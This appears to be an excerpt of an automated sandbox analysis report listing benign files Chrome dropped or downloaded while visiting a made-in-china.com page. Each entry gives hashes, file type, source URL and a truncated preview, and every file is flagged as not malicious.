                                                                                                          SHA-256:6CCE5AD8D496BC5179FA84AF8AFC568EEBA980D8A75058C6380B64FB42298C28
                                                                                                          SHA-512:FB80F091468A299B5209ACC30EDAF2001D081C22C3B30AAD422CBE6FEA7E5FE36A67A8E000D5DD03A30C60C30391C85FA31F3931E804C351AB0A71E9A978CC0F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:{. "manifest_version": 2,. "name": "windows-mf-cdm",. "version": "1.0.2738.0",. "accept_arch": [. "x64",. "x86_64",. "x86_64h". ].}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1765
                                                                                                          Entropy (8bit):6.016932513650603
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:6D1D175F88B64546105E3E7C31D1129A
                                                                                                          SHA1:75A1B56F55BB62B05365A0FDBFC7941DE77CBFAF
                                                                                                          SHA-256:A0BC246E8E160A9BB32FA60F4E7A04D148A17125F426509466031E07731FDF81
                                                                                                          SHA-512:5C80908331E30C7EAD67F7F6C5AB064B07626FD9C58925A0D2124D66B25C5AE2F218BDACFB68AFCB332E88EB297CFB7E0A7A9E5E1E54C9B7A510FEF095F9B54F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiSUxrUllPSmhIVEZacllLRmN5UC12SkJrVjNWbWVLdHo4d1hEb2VPWjBZMCJ9LHsicGF0aCI6InNzbF9lcnJvcl9hc3Npc3RhbnQucGIiLCJyb290X2hhc2giOiJyRFZLUnlPcXBQQnI3RGhkM2VTazBKZzYxUlJXOVNzeHFBYU95WDFiWHFjIn1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoiZ2lla2NtbWxua2xlbmxhb21wcGtwaGtuam1ubnBuZWgiLCJpdGVtX3ZlcnNpb24iOiI3IiwicHJvdG9jb2xfdmVyc2lvbiI6MX0","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"nBdNk-7bgnEftAs4hWaHwF1Lk9pt7Eh6pcqe2gyNsE7VnVRp-H27tm1RFAF4htCUlXNJxX6YY-MUiK2DqJpQ3c73KDaFV8DcnadQfcXO3Lbrw7jLYSUaSdzujPkTyhuFcq_BhK0KWiIJ0aJgh7nVOBfAa5AbE6oFlLKMB2Ls0gmzS1-a5hUIu4rw2h9r9jkr6gLYbein5Jk2hdwW3u-1GNjyki4dftG2iZNAI8VhUf5gnCiF4AHCnYSGJsM0RGkmO_HJIzgwpQpP3RDsG2ioeKgxL-kcHhjXWOj3uVGyxpp1FkyHGkeGuqpFZMAxx3CEBiOtFj7i3iQxkgEW-E3uMKI3yA
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66
                                                                                                          Entropy (8bit):3.9555383032528804
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:684DA5CCA8ADC8CA59CBE5B082CFE0B5
                                                                                                          SHA1:B8784E02DB81C5F846A7848455A2C6629A88BD64
                                                                                                          SHA-256:F48C9D93CC216AF13BBFAD15DD5E6D1679CD35D318E664029DDF61EFC6E51A5D
                                                                                                          SHA-512:EAEB9B8C51AEF3CC2749F4E6B2C2B58334E53C0BA701DB94F2896C9557B949D392CF4F44B771821C63DD238FAC2B2F869833BED2DFF830AFC4C8743683A75183
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1.3eb16d6c28b502ac4cfee8f4a148df05f4d93229fa36a71db8b08d06329ff18a
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):76
                                                                                                          Entropy (8bit):4.169145448714876
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:4AAA0ED8099ECC1DA778A9BC39393808
                                                                                                          SHA1:0E4A733A5AF337F101CFA6BEA5EBC153380F7B05
                                                                                                          SHA-256:20B91160E2611D3159AD82857323FEBC906457756678AB73F305C3A1E399D18D
                                                                                                          SHA-512:DFA942C35E1E5F62DD8840C97693CDBFD6D71A1FD2F42E26CB75B98BB6A1818395ECDF552D46F07DFF1E9C74F1493A39E05B14E3409963EFF1ADA88897152879
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:{. "manifest_version": 2,. "name": "sslErrorAssistant",. "version": "7".}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):6.108955364911366
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:E2F792C9E2DD86F39E8286B2EAD2FC70
                                                                                                          SHA1:8A32867614D2A23E473ED642056DED8E566687F9
                                                                                                          SHA-256:AC354A4723AAA4F06BEC385DDDE4A4D0983AD51456F52B31A8068EC97D5B5EA7
                                                                                                          SHA-512:6A7AF0CA1EFA65A89A9CA3B8DF0D2E24F21D91673C60CDFEEB02D33647442B01D535497249542F40E66E0D2DD3E9F8ED1F4A201FD97138D07A2B71366737E580
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:...5.3sha256/fjZPHewEHTrMDX3I1ecEIeoy3WFxHyGplOLv28kIbtI=.5.3sha256/m/nBiLhStttu1YmOz7Y3D2u1iB1dV2CbIfFa3R2YW5M=.5.3sha256/8Iuf4xRbVCmCMQTJn3rxlglIO1IOKoyuSUgmXyfaIKs=.5.3sha256/8IHdrS+r6IWzSMcRcD/GA6mBxk1ECX8tGRW0rtGWILE=.5.3sha256/k/2eeJTznE32mblA/du19wpVDSIReFX44M8wXa2JY30=.5.3sha256/urWd7jMwR6DJgvWhp6xfRHF5b/cba3iG0ggXtTR6AfM=.5.3sha256/IJPCDSE5tM9H3nuD5m6RU2i9KDdPXVn4qmC/ULlcZzc=.5.3sha256/0Gy8RMdbxHNWR2GQJ62QKDXORYf5JmMmnr1FJFPYpzM=.5.3sha256/8tTICtyaxIQrdbYYDdgZhTN0OpM9kYndvoImtw1Ys5E=.5.3sha256/F7HIlsaG0bpJW8CzYekRbtFqLVTTGqwvuwPDqnlLct0=.5.3sha256/zaV2Aw1A742R1+WpXWvL5atsJbGmeSS6dzZOfe6f1Yw=.5.3sha256/UwOkRGMlP0K/mKNJdpQ0sTg2ean9Tje8UTOvFYzt1GE=.5.3sha256/w7KUXE4/BAo1YVZdO3mBsrMpu4IQuN0mhUXUI//agVU=.5.3sha256/JnPvGqEn36FjHQlBXtG1uWwNtdMj1o2ojR/asqyypNk=.5.3sha256/AUSXlKDCf1X30WhWeAWbjToABfBkJrKWPL6KwEi5VH0=.5.3sha256/zSyVjjFJMIeXK0ktVTIjewwr6U5OePRqyY/nEXTI4P8=.5.3sha256/9dcHlrXN2WV/ehbEdMxMZ8IV4qvGejCtNC5r6nfTviM=.5.3sha256/E+0WZLGSIe5nddlVKZ5fYzaNHHCE3hNqi/OWZD3iKgA=.5.3sha2
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 200x200, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):8104
                                                                                                          Entropy (8bit):7.836775313509726
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:616A71806E907399F6EC80283041F45F
                                                                                                          SHA1:6D6D039868F86D2F92E0269E4E16792A555436B9
                                                                                                          SHA-256:82E94C08D2F3F85C162E5166A57A0A21EF4AF4D5A26AD8EE18AE6276DCC726A0
                                                                                                          SHA-512:C8E14649E8ADBE24B2999BC005870F7AFED8331736D8D6D96ACD9316DA0B4C2E714ACD0FBE4CB22FDAE4A93ACE60380428059234ADE09781BD527A91619D6118
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://pic.made-in-china.com/8f4j00yFlUfJQIHhWR/Gift-Packaging1727707402000.jpg
                                                                                                          Preview:......Exif..II*.................Ducky.......K......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="4F418327D5C9D3906340D8A999EB7F8F" xmpMM:DocumentID="xmp.did:5652ED087C7A11EF99A18B14B0026251" xmpMM:InstanceID="xmp.iid:5652ED077C7A11EF99A18B14B0026251" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0c23fa5b-9069-214f-861f-85dbbafec25c" stRef:documentID="adobe:docid:photoshop:74adab96-91f2-fc47-a88a-6d71d8724043"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):371
                                                                                                          Entropy (8bit):4.600540137157355
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:97CF0FE353C517CEA6CB3E1F2E7EDFC9
                                                                                                          SHA1:58D8EB24BFD5CA347B6A0A72894E6C8B6EAE198F
                                                                                                          SHA-256:0E0C8CEDB72A7E5A3080203509132486E267E5D1B0C5C6EAE78AC16F7928FF01
                                                                                                          SHA-512:F3D33FE997DC8FDFF9B122C208321F1DB35B2A6C2650C8EAC119A2A20FAE74874691340C3419283AE0914E5405D51E40BF787469B3A7A2B66A81A68B6E2009EB
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:(function(w,d,c,k,a,b,t,e) {.. var cs = d.currentScript;.. if (cs) {.. var uo = cs.getAttribute('data-ueto');.. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {.. w[uo].setUserSignals({'co': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});.. }.. }..})(window, document, 'us', false, false, false, false, false);..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (39156), with LF, NEL line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):58463
                                                                                                          Entropy (8bit):5.302548384262556
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:49EF970E480C99F043080B398EFB0CA5
                                                                                                          SHA1:B80046CD86811A8189554A973D4BD94A41E7D5B9
                                                                                                          SHA-256:5711A564A155B6B3A345259007224F3212392979F7AAB17FD2144C2679B7B7E2
                                                                                                          SHA-512:EACD669DC8CAFFF337625E55B57D58BAE56F3F128A068348F1EF991F242FDD843380E361C013B6B83F9D0FD2ADAFFA4D5FEBBE8ACDADEC2D3F15207A7E899886
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/polyfill/polyfill-simplify_e22603b6.js
                                                                                                          Preview:(function(){"use strict";var r=typeof globalThis!=="undefined"?globalThis:typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof self!=="undefined"?self:{};var N=function(r){return r&&r.Math===Math&&r};var t=N(typeof globalThis=="object"&&globalThis)||N(typeof window=="object"&&window)||N(typeof self=="object"&&self)||N(typeof r=="object"&&r)||N(typeof r=="object"&&r)||function(){return this}()||Function("return this")();var F={};var e=function(r){try{return!!r()}catch(r){return true}};var D=e;var a=!D(function(){return Object.defineProperty({},1,{get:function(){return 7}})[1]!==7});var G=e;var $=!G(function(){var r=function(){}.bind();return typeof r!="function"||r.hasOwnProperty("prototype")});var U=$;var B=Function.prototype.call;var n=U?B.bind(B):function(){return B.apply(B,arguments)};var V={};var z={}.propertyIsEnumerable;var H=Object.getOwnPropertyDescriptor;var W=H&&!z.call({1:2},1);V.f=W?function r(t){var e=H(this,t);return!!e&&e.enumerable}:z;var Y=funct
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):89232
                                                                                                          Entropy (8bit):5.15322181389628
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:E5D134825478C5B3BF7A0347295106F3
                                                                                                          SHA1:AFE7E5E23CDBFF79E43C963B304EA4F6EADA096D
                                                                                                          SHA-256:32E457F3BFC7F102740B82FB11395502CB2AB830960C969CB8E7F13118E12624
                                                                                                          SHA-512:ECFB79561810296E14384B2530A3D4BBCFEB38A7CA96C35723FDE20676D2C3068CEF7392E6B24D3C14757A0A496B4887F983B0369E6C12EAE36A39AC335DC449
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-e755ccfc180e7a2ab623-min.en-US.js
                                                                                                          Preview:(()=>{var u={544791:(_,i,a)=>{var s={"./en.json":839132,"src/main/webapp/universal/node_modules/@sqs/i18n-cldr/packs/en.json":839132};function e(n){var r=o(n);return a(r)}function o(n){if(!a.o(s,n)){var r=new Error("Cannot find module '"+n+"'");throw r.code="MODULE_NOT_FOUND",r}return s[n]}e.keys=function(){return Object.keys(s)},e.resolve=o,_.exports=e,e.id=544791},839132:_=>{"use strict";_.exports=JSON.parse(`{"version":"1.8.3","cldr":"44.0.1","checksum":"9fa7a50e","language":"en","defaultTag":"en-Latn-US","scripts":{"Latn":{"strings":"E_Afar_Abkhazian_Achinese_Acoli_Adangme_Adyghe_Avestan_Tunisian Arabic_Afrikaans_Afrihili_Aghem_Ainu_Akan_Akkadian_Alabama_Aleut_Gheg Albanian_Southern Altai_Amharic_Aragonese_Old English_Angika_Arabic_Aramaic_Mapuche_Araona_Arapaho_Algerian Arabic_Najdi Arabic_Arawak_Moroccan Arabic_Egyptian Arabic_Assamese_Asu_American Sign Language_Asturian_Avaric_Kotava_Awadhi_Aymara_Azerbaijani_Bashkir_Baluchi_Balinese_Bavarian_Basaa_Bamun_Batak Toba_Ghomala_Belar
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (18185), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):18185
                                                                                                          Entropy (8bit):5.650879574373191
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:58B005AE60786A45932F8A16217884D5
                                                                                                          SHA1:12096ABB3DCFD3FC801EEBFE22D481104A1624E6
                                                                                                          SHA-256:FFC5081565902479A0030E0840D59D1920E504993ED3AE7F7C22E05DBBD2486C
                                                                                                          SHA-512:BD1DB8E4DCD83F99B6DF3666B5C2D93DB602C31BF1B20047DD1A5DB7D2ACD3B56F65D8F0BD91621F3951AE8AAC88AA97AE9AA16189A63EF65474C82554769F6A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://assets.squarespace.com/universal/styles-compressed/commerce-fb908395734262466dc9-min.en-US.css
                                                                                                          Preview:.uppercase{text-transform:uppercase}.template-cart-item-added-popover{background-color:var(--navigationLinkColor);box-shadow:0 6px 24px 0 rgba(0,0,0,.12),0 0 1px 0 rgba(0,0,0,.08);display:flex;left:unset;line-height:22px;max-width:300px;padding-right:11px;position:fixed;right:4vw;transition:transform .15s ease 50ms,opacity .2s ease 0s;width:max-content;z-index:30001}@media screen and (max-width:640px){.template-cart-item-added-popover{right:6vw}}.template-cart-item-added-popover p{color:var(--siteBackgroundColor);font-size:16px;line-height:22px;margin:0;padding:16px}.template-cart-item-added-popover .close{align-items:center;color:var(--siteBackgroundColor);cursor:pointer;display:flex;width:36px}.template-cart-item-added-popover.hidden{visibility:hidden}.captcha-container.rendered{margin-bottom:24px;width:304px}.captcha-container.rendered.align-center{margin-left:auto;margin-right:auto}.captcha-container.rendered.align-right{margin-left:auto}.sqs-async-form-content .field-error{backgro
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (14119), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):14119
                                                                                                          Entropy (8bit):4.896426731793705
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:E1D1A80B46872F93818A985E88A6E877
                                                                                                          SHA1:B546CF4C39CCC8BBBDDDBB86CBC8B8D149E4F301
                                                                                                          SHA-256:4255B3E8937D02E114D491E449B5755A584038C54CF94BD38CF42FD0FE443AB6
                                                                                                          SHA-512:40014C6801B34947B2DBC5325AF99C264ED86E2223B1976E797D90503605FFAEEB58F2162D9D477EA721EB8E3E9D308035898EFB8472E0535F4D8880FB86FA28
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://assets.squarespace.com/universal/styles-compressed/2356ee25bed07678b7ee-min.en-US.css
                                                                                                          Preview:.gdpr-cookie-banner{box-sizing:border-box}.gdpr-cookie-banner .button-group{display:flex}.gdpr-cookie-banner p{margin:0}.gdpr-cookie-banner.bar{align-items:center;display:flex;justify-content:space-between}.gdpr-cookie-banner.popup{display:flex;flex-direction:column}.gdpr-cookie-banner.full-styling{font-size:12px;z-index:300000}.gdpr-cookie-banner.full-styling.legacy-dark{background:#000;color:#fff}.gdpr-cookie-banner.full-styling.legacy-dark .sqs-toggle>input{background-color:#0e0e0e}.gdpr-cookie-banner.full-styling.legacy-dark .sqs-toggle--off{background-color:#b7b7b7}.gdpr-cookie-banner.full-styling.legacy-dark .sqs-toggle--on,.gdpr-cookie-banner.full-styling.legacy-dark hr{background-color:#fff}.gdpr-cookie-banner.full-styling.legacy-dark .manage-bar-action{color:#fff}.gdpr-cookie-banner.full-styling.legacy-dark .disclaimer-text a{background-image:linear-gradient(90deg,currentColor 100%,currentColor 0);background-position:0 100%;background-repeat:repeat-x;background-size:1px 1px;wh
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 200x200, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):9221
                                                                                                          Entropy (8bit):7.924204161672881
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:ACAD30BB713A0BFD71464663BE64E0B4
                                                                                                          SHA1:BEC6FFB861A70BF8C800A51FC22B4574B6DC62F8
                                                                                                          SHA-256:1ABC302E747DAE877C7D63D63931A1FC4959E16E6376CA24336B835BC14007CB
                                                                                                          SHA-512:CC9DF1353231FC113B33BBB87B6EF781C12BDCD7A46D2D816C5B279FAA4382C902DA66CF48381BB6F61EF735D1CD7DA0BADC2C9146AAAA76D90774F04E82DF46
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://pic.made-in-china.com/8f4j00AFhURpQKYVWf/LCD1727707376000.jpg
                                                                                                          Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="C27447C28FE10C4F64C02F5F34F8202A" xmpMM:DocumentID="xmp.did:4FCF70BA7C7A11EF929F8DB6EA3579AB" xmpMM:InstanceID="xmp.iid:4FCF70B97C7A11EF929F8DB6EA3579AB" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a8da7678-f695-9342-9a4e-d2edbf0b78bb" stRef:documentID="adobe:docid:photoshop:7e7db6a6-9c3b-b74e-b518-460d7773c6d0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):6685
                                                                                                          Entropy (8bit):7.863838918142083
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:7EDE09C173B49C1A4283B7478867B7E8
                                                                                                          SHA1:856399F92B9EA46DE030159F21C5CE6B6ACF9BFA
                                                                                                          SHA-256:6EEB46F920937F0422AAD9466042A5EB223BF3F3CE48D81B9D547D704A871DA8
                                                                                                          SHA-512:3CA3C3B9C241EF78DC3352BBA07D4FC6BC9A9980784FF97C42AEF6D6A4DF63915745D36F88469B929559B21E8362E5C92B99AF3D86F2DD0E34A8FA3C4408B206
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://pic.made-in-china.com/61f54j00hYfRCmEHRUlG/Power-Energy.jpg
                                                                                                          Preview:......JFIF.....H.H.....C....................................................................C.......................................................................2.2...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..]..C?......}>......5o...oN.y...F../....`..&.uU..[K..^..B....X.H<.9..e..a...C...k.8.b....m..U..r..:....?/>..d.|..f...?...ZK...T....*4.V8...r..g.9.s...?...q[$.VIid....D.....)NRrrnRm..n.~&.m.}.B-...u...Fm.R.d._*.ygx.4....I<......,@..Z4(..j.....95.S..z.q.WYI!...Nu.U.F.(..Vq.*pJ.u'&..%........w.]Nm.i.....f.a.YZ..Hnr..x.S..o....\.4R4......5v...)J=jM.M.U.+.....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (5760)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):5857
                                                                                                          Entropy (8bit):5.102721253422244
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:4C3C6D35EF2BEA3855C46156D72E7B64
                                                                                                          SHA1:1CB1A9CD34BCF45A645ACC934E62AB6D4EDB7153
                                                                                                          SHA-256:884B878422D9EF1CE3A7D6803B24654336C3D538610970C98740AD0FCC83A35E
                                                                                                          SHA-512:0FB79C7E1F0370138265795E8D5D84521B50E3B15EA4A8113AF0098F59A96E257739B8E991908082F0A1067E1032ADBA4CCF6DFFBBDEC364C33ACC428DCC27B8
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/js/assets/picRound/picRound_26b74f74.js
                                                                                                          Preview:void function(i){if(this.PicRound)return;var t=new Abstract({picRoundStart:function i(){},picRoundStop:function i(){},onChangeDerection:function i(t){},getRoundDirection:function i(){},changeSpeed:function i(t){}});var n={isAutoPlay:true,autoPlayAction:"",speed:1e3,roundDirection:"right",roundTimeOut:null,picSize:null,imgNum:0,imgs:[],carrier:{imgbox:"#egimgbox",imgboxWrap:"#egimgboxWrap",startBtn:null,stopBtn:null,turnRightBtn:null,turnLeftBtn:null}};var o=new Clazz(t,{config:n,inherit:Component},function(i){this.setConfig(i);this._init()});o.extend({_init:function i(){var t=this;this.picRoundStart.implement(this._start);this.picRoundStop.implement(this._stop);this.onChangeDerection.implement(this._onChangeDerection);this.getRoundDirection.implement(this._getRoundDirection);this.changeSpeed.implement(this._changeSpeed);this.config.imgs=$(this.config.carrier.imgbox);this.config.hasloaded=false;this.config.imgs.css({position:"relative"});this.config.imgNum=$(this.config.carrier.imgbox).
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):4286
                                                                                                          Entropy (8bit):2.6322053216301993
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:DB52C84BD7417FDC629F75300E5CE80C
                                                                                                          SHA1:CE8036FBD7714CE312034D7702FD2904A39BF6C1
                                                                                                          SHA-256:85C7CDA25B4A324B82F4E0EFD6AE2EEE4D606B9552C24A47EAB44155F4D620C7
                                                                                                          SHA-512:E4F9764E0E2B9B0382C99D56FD7BBC75335DAA6511B695983374ABE8A474A7B740EAC03CE15CFCD97DB2932CEF6E757A261A75CF0297AC072D9DB65663A357B4
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.made-in-china.com/favicon.ico
                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$..$...$...$...$...$...$...$..$...$...$...$...$...$...$...$...$...$...$...$...$..$...$...$...$...$...$...$...$...$...$...$...$...$...$...$...$...$...$...$...$..~$...$.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 990x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:dropped
                                                                                                          Size (bytes):27070
                                                                                                          Entropy (8bit):7.991979090960499
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:
                                                                                                          MD5:C013D767222B389148812DBD20162D52
                                                                                                          SHA1:483BD0B7852CDA0B77FEF54BCC117464157EFC9A
                                                                                                          SHA-256:3E80ECE087E4C53CDFE3A29CBE75F6E88BD64A4C9388B50BA6163D9947B489D3
                                                                                                          SHA-512:A6811BD40F9F5F446943A23840E232632C6618BE7393B46834CB9061D1ABEDDE35F3A4831F5A6C22CAD990E4D2C00BE3A782D2C418A260A8DC5CBE28C18954B5
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:RIFF.i..WEBPVP8 .i.......*....>m4.H.%..$.Zj0..cn....1...E=.Y...........O.n.9.?._........3.q.?..y.,..z....)...K.....~.w.'~..[.....w..../...~................s............o....vy.L.O...}....N....;.Gx<..*......'......?.w.?.z........?.?7=v.....#.......}....o...?._......z...(.$.....]...p....x.......4u6...U...D>}.C6....I....6.*6.C_...}6..|y.+K..ZO..n...8..u..8im.Lx ...g.FU...>X.B.A..3...g.V....H.wk.p..6L..jgdq.....Z.bS..+V.H..@.....E........c8'.......5.[[{.....p..Qk..Vr..x.nZ.i'x.).>.N.8..2.....'n...U....._....uB.j.n..uPn......f.q]...2{..L...s..c..!aj1+.....3.HYd.d).Y\...(.....9G.9...2.Q.2.g.O......(.W`.....0.o..j.w..`.{T..sSxVF.G...Ah C.dAZ^#9.....,......Z.K\V..h.8..H_.....<..B.%.k.f..z4%I.y.....s.`.w......k.q.L..J.le.M.t...z..Aq..y'.v....1..L.n..ks.6...|'.E.Y..Ir.\.%;.\g....[.^....s...Ip.....#.~X...Q....T...V...R.....XG...llw....pX.0.........*.r..Q.._Z..|....=..#.....nU...F.;m.. ,.y.P%X...@...$.........-...1...e4..JW.......g)(.]@<M!..^...
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (5470)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):5556
                                                                                                          Entropy (8bit):5.238675241362087
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:DC7B64E83CDA8B8289C8D12E9F86C703
                                                                                                          SHA1:27F703872D3C54D1937904A7748299AE8C03A56B
                                                                                                          SHA-256:5E417B8551412B5191C11F9F7B4145B81D9877DE2B4EB68CC548A771281CE312
                                                                                                          SHA-512:A6FE719C9FF60E51E986AE92FE9D7F8A87B28DEF8A1895F0CBD3AFB6A0D8830FF03F3091CD4800513FD70CD9FCA795234933B1C5735326EBBEAC5378C4C05F87
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/js/libs/class.0.3.2_2c7a4288.js
